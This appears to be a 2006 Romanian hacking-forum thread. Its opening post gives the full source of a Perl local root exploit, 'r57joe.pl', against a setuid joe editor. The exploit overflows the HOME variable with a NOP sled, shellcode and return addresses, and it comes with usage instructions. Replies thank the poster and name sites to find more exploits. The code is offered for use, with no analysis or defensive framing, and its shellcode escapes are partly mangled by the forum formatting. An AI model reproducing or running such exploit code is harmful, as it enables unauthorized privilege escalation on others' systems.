mario23 Posted July 9, 2006 Report Share Posted July 9, 2006 #!/usr/bin/perl# ***#  __________        ___ ___  #  ______  __ __  ______/  |   #  |    _/  |  /  ___/   _   #  |   |   |  /___     /#  |____|_  /____//____  >___|_  /  #      /      /    /  # ***# r57joe.pl# Linux "joe" local exploit# by 1dt.w0lf // RusH security team# ***# usage: ./joe [offset]# by default offset = -1000 : tested on ASPlinux 9.0$len=1056;$ret = 0xbfffffb1;$offset = -1000;$nop = "x90";# proof of concept$shellcode ="x31xdbx89xd8xb0x17xcdx80" .       "x31xdbx89xd8xb0x2excdx80" .       "xebx1fx5fx89xfcx66xf7xd4x31xc0x8ax07" .       "x47x57xaex75xfdx88x67xffx48x75xf6x5b" .       "x53x50x5ax89xe1xb0x0bxcdx80xe8xdcxff" .       "xffxffx01x2fx74x6dx70x2fx73x68x01";if(@ARGV != 1){print "-----------------------------n";print "*** joe.pln";print "*** linux joe local exploitn";print "*** usage: ./joe.pl [offset]n";print "*** offset -1000 : tested on ASPLinux 9.0n";print "-----------------------------n";exit();}if (@ARGV == 1){$offset = $ARGV[0];}if( ! -u "/usr/bin/joe" ){     print "joe is not suid (n";     exit();}for ($i = 0; $i < ($len - length($shellcode) - 156); $i++)    {   $buffer .= $nop;    }$buffer .= $shellcode;$pack_ret = pack('l', ($ret + $offset));chomp($pack_ret);for($i = 0; $i < 156; $i += 4)   {   $buffer .= $pack_ret;   }print "-----------------------------n";print "*** joe local exploit by r57n";print "-----------------------------n";print "OFFSET : $offsetn";print "-----------------------------n";local($ENV{'HOME'}) = $buffer;exec("/usr/bin/joe");# EOF Quote Link to comment Share on other sites More sharing options...
Screech Posted July 9, 2006 Report Share Posted July 9, 2006 mario23, mersi ptr ele dar te mai opresti Quote Link to comment Share on other sites More sharing options...
imported_ZbeNg Posted July 11, 2006 Report Share Posted July 11, 2006 superb Quote Link to comment Share on other sites More sharing options...
mario23 Posted July 11, 2006 Author Report Share Posted July 11, 2006 Xavier daca vrei tu ma opresc :@ Quote Link to comment Share on other sites More sharing options...
nos Posted July 11, 2006 Report Share Posted July 11, 2006 mai posteaza mai mario si dane si noua sursa..... Quote Link to comment Share on other sites More sharing options...
mario23 Posted July 11, 2006 Author Report Share Posted July 11, 2006 nos, ce sursa frate Quote Link to comment Share on other sites More sharing options...
nos Posted July 12, 2006 Report Share Posted July 12, 2006 de unde iei tu astea :@ Quote Link to comment Share on other sites More sharing options...
mario23 Posted July 14, 2006 Author Report Share Posted July 14, 2006 Sursele mele sunt www.milw0rm.com, www.packetstormsecurity.org si siturile rusesti, daca stii rusa uita-te pe www.video.antichat.ru {sursa principala} de acolo gasesti linkuri numai sa stii tu rusa Quote Link to comment Share on other sites More sharing options...